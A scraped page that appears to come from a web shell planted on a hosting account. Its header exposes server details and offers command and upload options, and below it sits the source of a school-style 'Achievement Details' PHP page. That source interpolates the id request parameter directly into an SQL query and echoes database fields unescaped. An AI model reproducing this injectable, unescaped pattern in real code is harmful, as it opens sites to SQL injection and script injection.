|
Server IP : 2a02:4780:3:1493:0:3736:a38e:7 / Your IP : 216.73.216.60 Web Server : LiteSpeed System : Linux sg-nme-web1393.main-hosting.eu 4.18.0-553.77.1.lve.el8.x86_64 #1 SMP Wed Oct 8 14:21:00 UTC 2025 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u926327694/domains/smsoft.in/public_html/demo/../help2/../arjdwd/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
if(isset($_GET['id']))
{
$id = $_GET['id'];
include('header.php');
$news_letter_class = "newsletter-area-2";
?>
<section class="page-banner">
<div class="page-banner-bg bg_cover" >
<div class="container">
<h2 class="about-title custom_title"><span>Achievement Details</span></h2>
</div>
</div>
</section>
<section class="mb-50">
<div class="container">
<?php
$query_mng = mysqli_query($con,"select * from achievers where id=$id");
while($res_mng = mysqli_fetch_array($query_mng))
{
?>
<div class="row teachers-row justify-content-center">
<div class="col-lg-12 teachers-col">
<div class="teacher-details-content mt-45">
<h4 class="teacher-name"><?php echo $res_mng['event']; ?></h4>
<ul class="teacher-contact">
<li><strong>Name:</strong> <a href="#"><?php echo $res_mng['name']; ?></a></li>
<li><strong>Year:</strong> <a href="#"><?php echo $res_mng['year']; ?></a></li>
<li><strong>place:</strong> <a href="#"><?php echo $res_mng['place']; ?></a></li>
</ul>
<p><?php echo $res_mng['remarks']; ?></p>
</div>
</div>
</div>
<?php
}
?>
</div>
</section>
<?php include('footer.php'); ?>
<?php
}
else
{
echo"<script>window.location='achievement.php';</script>";
}
?>